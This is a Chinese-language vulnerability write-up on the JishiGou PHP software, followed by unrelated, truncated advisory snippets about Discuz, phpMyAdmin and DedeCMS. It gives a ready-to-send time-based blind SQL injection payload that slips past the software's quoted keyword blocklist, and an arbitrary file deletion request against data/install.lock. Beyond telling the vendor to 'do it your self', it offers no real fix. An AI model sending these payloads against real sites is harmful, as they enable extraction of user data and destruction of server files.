0x1 盲注
0x2 任意檔案刪除
0x1 盲注
在modules/ajax/topic.mod.php中
function group_fields()
' and gid=".$g_id;
$query = $this->databasehandler->query($sql);
$fields_info=$query->getrow();
…...//省略 www.2cto.com
}$gid和$touid沒做過濾,直接帶入查詢,但是查詢之前經過了checkquery()檢測,去除了一些關鍵字元,但是沒有去除完整。
$_config['security']['querysafe']['dfunction']['0'] = 'load_file';
$_config['security']['querysafe']['dfunction']['1'] = 'hex';
$_config['security']['querysafe']['dfunction']['2'] = 'substring';
$_config['security']['querysafe']['dfunction']['4'] = 'ord';
$_config['security']['querysafe']['dfunction']['5'] = 'char';
$_config['security']['querysafe']['daction']['0'] = 'intooutfile';
$_config['security']['querysafe']['daction']['1'] = 'intodumpfile';
$_config['security']['querysafe']['daction']['2'] = 'unionselect';
$_config['security']['querysafe']['daction']['4'] = 'unionall';
$_config['security']['querysafe']['daction']['5'] = 'uniondistinct';
$_config['security']['querysafe']['dnote']['0'] = '/'.'*';
$_config['security']['querysafe']['dnote']['1'] = '*/';
$_config['security']['querysafe']['dnote']['2'] = '#';
$_config['security']['querysafe']['dnote']['3'] = '--';
過濾了substring(其實我才知道mysql也可以用substring),沒過濾substr,
利用基於時間的盲注可以突破,最後構造乙個post包,傳送到ajax.php?code=group_fields
底下引數填寫:
gid=1 or if(substr((select nickname from jishigou_members limit 0,1),1,1)=0x61,sleep(1),1)&touid=34
最後執行的語句為:
select * from jishigou_group where uid =0 and id=1 or if(substr((select nickname from jishigou_members limit 0,1),1,1)=0x61,sleep(1),1)
唉~~ 給那兩個引數加個intval 把
0x2 任意檔案刪除
在modules/ajax/event.mod.php中
function onloadpic()
…../省略}
hid_pic 沒經過過濾,直接被unlink,這個漏洞需要至少普通使用者的許可權
所以我們構造乙個post包,提交到/ajax.php?code=onloadpic&mod=event
底下的引數填寫hid_pic=want_to_delete_file
即可把相應的檔案刪除~
本地測試刪除data/install.lock成功,官網刪除data/install.lock沒成功?? 許可權問題???
修復方案:
do it your self
作者 yy520
Discuz X V3 4後台任意檔案刪除
該漏洞為後台任意檔案刪除,需要有管理員的許可權,所以說危害非常小 docker vulhub master 啟動環境docker compose up d 安裝discuz x v3.4 資料庫名設定為db 訪問後台並登入http your ip admin.php 進入論壇 模組管理 編輯板塊 使...
PhpMyadmin任意檔案讀取漏洞及修復方案
簡要描述 phpmyadmin實現中錯誤的使用了 xml load string函式用於xml解析,但是該函式中預設並沒有處理好外部實體的安全性,導致使用者可以借助xml檔案讀取和訪問應用有許可權訪問的系統和網路資源 詳細說明 libraries import xml.php中 unset data...
DedeCMS v5 7 註冊使用者任意檔案刪除漏洞
漏洞名稱 dedecms v5.7 註冊使用者任意檔案刪除漏洞 危險等級 高危 漏洞檔案 member inc archives check edit.php 漏洞描述 註冊會員使用者可利用此漏洞任意刪除 檔案。修復方法 開啟 member inc archives check edit.php 找...